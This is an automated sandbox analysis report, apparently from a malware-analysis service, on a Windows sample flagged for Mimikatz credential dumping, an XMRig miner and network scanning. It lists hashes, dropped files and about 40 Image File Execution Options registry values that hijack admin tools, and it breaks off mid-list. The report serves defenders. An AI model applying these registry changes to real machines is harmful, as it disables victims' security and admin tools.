Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
17-10-2024 11:46
Behavioral task
behavioral1
Sample
2024-10-17_04852ff736e1a732385f302776eba267_hacktools_icedid_mimikatz.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2024-10-17_04852ff736e1a732385f302776eba267_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-10-17_04852ff736e1a732385f302776eba267_hacktools_icedid_mimikatz.exe
-
Size
10.3MB
-
MD5
04852ff736e1a732385f302776eba267
-
SHA1
262a18c617dfc53264777fe0ce2b378064647045
-
SHA256
e4988e041acf3c2a83bd80bbd92d8ffbd5669d63df633eb96990ab1a6ace733a
-
SHA512
e3edf474147fc3be14792cb92751b468bae4de9096739b7be21c1238ec19c7f2ea185eea74e9adb714b695ea601a2714e33329a092e3bc07c849ef6e75c376e6
-
SSDEEP
196608:7po1mknGzwHdOgEPHd9BbX/nivPlTXTYe:agjz0E57/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1212 created 2116 1212 nsgwibn.exe 38 -
Contacts a large (28862) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/936-178-0x00007FF717780000-0x00007FF7178A0000-memory.dmp xmrig behavioral2/memory/936-182-0x00007FF717780000-0x00007FF7178A0000-memory.dmp xmrig behavioral2/memory/936-203-0x00007FF717780000-0x00007FF7178A0000-memory.dmp xmrig behavioral2/memory/936-216-0x00007FF717780000-0x00007FF7178A0000-memory.dmp xmrig behavioral2/memory/936-222-0x00007FF717780000-0x00007FF7178A0000-memory.dmp xmrig behavioral2/memory/936-234-0x00007FF717780000-0x00007FF7178A0000-memory.dmp xmrig behavioral2/memory/936-249-0x00007FF717780000-0x00007FF7178A0000-memory.dmp xmrig behavioral2/memory/936-258-0x00007FF717780000-0x00007FF7178A0000-memory.dmp xmrig behavioral2/memory/936-267-0x00007FF717780000-0x00007FF7178A0000-memory.dmp xmrig behavioral2/memory/936-364-0x00007FF717780000-0x00007FF7178A0000-memory.dmp xmrig behavioral2/memory/936-365-0x00007FF717780000-0x00007FF7178A0000-memory.dmp xmrig behavioral2/memory/936-367-0x00007FF717780000-0x00007FF7178A0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/3232-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/3232-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0009000000023bfa-6.dat mimikatz behavioral2/memory/400-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/4296-138-0x00007FF6D26D0000-0x00007FF6D27BE000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts nsgwibn.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts nsgwibn.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 2356 netsh.exe 4292 netsh.exe -
Executes dropped EXE 29 IoCs
pid Process 400 nsgwibn.exe 1212 nsgwibn.exe 2832 wpcap.exe 8 kzurgcimy.exe 4296 vfshost.exe 5032 yumgbbwyg.exe 5000 xohudmc.exe 5100 kcuyyg.exe 936 ierigg.exe 2088 yumgbbwyg.exe 3252 yumgbbwyg.exe 4384 yumgbbwyg.exe 3236 nsgwibn.exe 3708 yumgbbwyg.exe 2280 yumgbbwyg.exe 3656 yumgbbwyg.exe 2396 yumgbbwyg.exe 2768 yumgbbwyg.exe 3616 yumgbbwyg.exe 720 yumgbbwyg.exe 3284 yumgbbwyg.exe 2232 yumgbbwyg.exe 3456 yumgbbwyg.exe 4824 yumgbbwyg.exe 4548 yumgbbwyg.exe 3060 yumgbbwyg.exe 3656 yumgbbwyg.exe 4204 vvwuinghb.exe 4464 nsgwibn.exe -
Loads dropped DLL 12 IoCs
pid Process 2832 wpcap.exe 2832 wpcap.exe 2832 wpcap.exe 2832 wpcap.exe 2832 wpcap.exe 2832 wpcap.exe 2832 wpcap.exe 2832 wpcap.exe 2832 wpcap.exe 8 kzurgcimy.exe 8 kzurgcimy.exe 8 kzurgcimy.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 86 ifconfig.me 87 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\system32\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\kcuyyg.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE nsgwibn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies nsgwibn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft nsgwibn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content nsgwibn.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BB4F4B8E2B2CFC476849B6B724C153FF nsgwibn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BB4F4B8E2B2CFC476849B6B724C153FF nsgwibn.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache nsgwibn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData nsgwibn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 nsgwibn.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\kcuyyg.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 nsgwibn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 nsgwibn.exe File created C:\Windows\system32\wpcap.dll wpcap.exe -
resource yara_rule behavioral2/files/0x0007000000023c9d-136.dat upx behavioral2/memory/4296-135-0x00007FF6D26D0000-0x00007FF6D27BE000-memory.dmp upx behavioral2/memory/4296-138-0x00007FF6D26D0000-0x00007FF6D27BE000-memory.dmp upx behavioral2/files/0x0007000000023ca5-141.dat upx behavioral2/memory/5032-142-0x00007FF75F9E0000-0x00007FF75FA3B000-memory.dmp upx behavioral2/memory/5032-150-0x00007FF75F9E0000-0x00007FF75FA3B000-memory.dmp upx behavioral2/files/0x0007000000023ca7-163.dat upx behavioral2/memory/936-165-0x00007FF717780000-0x00007FF7178A0000-memory.dmp upx behavioral2/memory/2088-171-0x00007FF75F9E0000-0x00007FF75FA3B000-memory.dmp upx behavioral2/memory/3252-175-0x00007FF75F9E0000-0x00007FF75FA3B000-memory.dmp upx behavioral2/memory/936-178-0x00007FF717780000-0x00007FF7178A0000-memory.dmp upx behavioral2/memory/4384-180-0x00007FF75F9E0000-0x00007FF75FA3B000-memory.dmp upx behavioral2/memory/936-182-0x00007FF717780000-0x00007FF7178A0000-memory.dmp upx behavioral2/memory/3708-189-0x00007FF75F9E0000-0x00007FF75FA3B000-memory.dmp upx behavioral2/memory/2280-193-0x00007FF75F9E0000-0x00007FF75FA3B000-memory.dmp upx behavioral2/memory/3656-197-0x00007FF75F9E0000-0x00007FF75FA3B000-memory.dmp upx behavioral2/memory/2396-201-0x00007FF75F9E0000-0x00007FF75FA3B000-memory.dmp upx behavioral2/memory/936-203-0x00007FF717780000-0x00007FF7178A0000-memory.dmp upx behavioral2/memory/2768-206-0x00007FF75F9E0000-0x00007FF75FA3B000-memory.dmp upx behavioral2/memory/3616-210-0x00007FF75F9E0000-0x00007FF75FA3B000-memory.dmp upx behavioral2/memory/720-214-0x00007FF75F9E0000-0x00007FF75FA3B000-memory.dmp upx behavioral2/memory/936-216-0x00007FF717780000-0x00007FF7178A0000-memory.dmp upx behavioral2/memory/3284-219-0x00007FF75F9E0000-0x00007FF75FA3B000-memory.dmp upx behavioral2/memory/936-222-0x00007FF717780000-0x00007FF7178A0000-memory.dmp upx behavioral2/memory/2232-224-0x00007FF75F9E0000-0x00007FF75FA3B000-memory.dmp upx behavioral2/memory/3456-228-0x00007FF75F9E0000-0x00007FF75FA3B000-memory.dmp upx behavioral2/memory/4824-231-0x00007FF75F9E0000-0x00007FF75FA3B000-memory.dmp upx behavioral2/memory/4548-233-0x00007FF75F9E0000-0x00007FF75FA3B000-memory.dmp upx behavioral2/memory/936-234-0x00007FF717780000-0x00007FF7178A0000-memory.dmp upx behavioral2/memory/3060-236-0x00007FF75F9E0000-0x00007FF75FA3B000-memory.dmp upx behavioral2/memory/3656-238-0x00007FF75F9E0000-0x00007FF75FA3B000-memory.dmp upx behavioral2/memory/936-249-0x00007FF717780000-0x00007FF7178A0000-memory.dmp upx behavioral2/memory/936-258-0x00007FF717780000-0x00007FF7178A0000-memory.dmp upx behavioral2/memory/936-267-0x00007FF717780000-0x00007FF7178A0000-memory.dmp upx behavioral2/memory/936-364-0x00007FF717780000-0x00007FF7178A0000-memory.dmp upx behavioral2/memory/936-365-0x00007FF717780000-0x00007FF7178A0000-memory.dmp upx behavioral2/memory/936-367-0x00007FF717780000-0x00007FF7178A0000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\guiyywyg\nsgwibn.exe 2024-10-17_04852ff736e1a732385f302776eba267_hacktools_icedid_mimikatz.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\cnli-1.dll nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\xdvl-0.dll nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\ssleay32.dll nsgwibn.exe File created C:\Windows\guiyywyg\vimpcsvc.xml nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\trfo-2.dll nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\svschost.xml nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\vimpcsvc.xml nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\AppCapture64.dll nsgwibn.exe File created C:\Windows\iguwtuflb\umnwwtqyn\Packet.dll nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\spoolsrv.exe nsgwibn.exe File created C:\Windows\iguwtuflb\Corporate\vfshost.exe nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\coli-0.dll nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\crli-0.dll nsgwibn.exe File opened for modification C:\Windows\guiyywyg\spoolsrv.xml nsgwibn.exe File created C:\Windows\iguwtuflb\upbdrjv\swrpwe.exe nsgwibn.exe File opened for modification C:\Windows\guiyywyg\nsgwibn.exe 2024-10-17_04852ff736e1a732385f302776eba267_hacktools_icedid_mimikatz.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\tucl-1.dll nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\vimpcsvc.xml nsgwibn.exe File created C:\Windows\iguwtuflb\Corporate\mimilib.dll nsgwibn.exe File created C:\Windows\guiyywyg\docmicfg.xml nsgwibn.exe File opened for modification C:\Windows\guiyywyg\docmicfg.xml nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\Shellcode.ini nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\libxml2.dll nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\tibe-2.dll nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\zlib1.dll nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\docmicfg.xml nsgwibn.exe File created C:\Windows\iguwtuflb\Corporate\mimidrv.sys nsgwibn.exe File opened for modification C:\Windows\iguwtuflb\Corporate\log.txt cmd.exe File created C:\Windows\iguwtuflb\umnwwtqyn\wpcap.dll nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\svschost.exe nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\docmicfg.exe nsgwibn.exe File created C:\Windows\guiyywyg\spoolsrv.xml nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\svschost.xml nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\schoedcl.xml nsgwibn.exe File created C:\Windows\iguwtuflb\umnwwtqyn\scan.bat nsgwibn.exe File opened for modification C:\Windows\iguwtuflb\umnwwtqyn\Result.txt vvwuinghb.exe File opened for modification C:\Windows\iguwtuflb\umnwwtqyn\Packet.dll nsgwibn.exe File created C:\Windows\iguwtuflb\umnwwtqyn\vvwuinghb.exe nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\schoedcl.exe nsgwibn.exe File opened for modification C:\Windows\guiyywyg\svschost.xml nsgwibn.exe File opened for modification C:\Windows\guiyywyg\schoedcl.xml nsgwibn.exe File created C:\Windows\iguwtuflb\umnwwtqyn\ip.txt nsgwibn.exe File created C:\Windows\iguwtuflb\umnwwtqyn\wpcap.exe nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\trch-1.dll nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\schoedcl.xml nsgwibn.exe File created C:\Windows\guiyywyg\schoedcl.xml nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\exma-1.dll nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\libeay32.dll nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\vimpcsvc.exe nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\AppCapture32.dll nsgwibn.exe File created C:\Windows\iguwtuflb\umnwwtqyn\kzurgcimy.exe nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\posh-0.dll nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\ucl.dll nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\spoolsrv.xml nsgwibn.exe File created C:\Windows\ime\nsgwibn.exe nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\spoolsrv.xml nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\docmicfg.xml nsgwibn.exe File created C:\Windows\guiyywyg\svschost.xml nsgwibn.exe File opened for modification C:\Windows\guiyywyg\vimpcsvc.xml nsgwibn.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4472 sc.exe 1096 sc.exe 4428 sc.exe 508 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kzurgcimy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kcuyyg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened 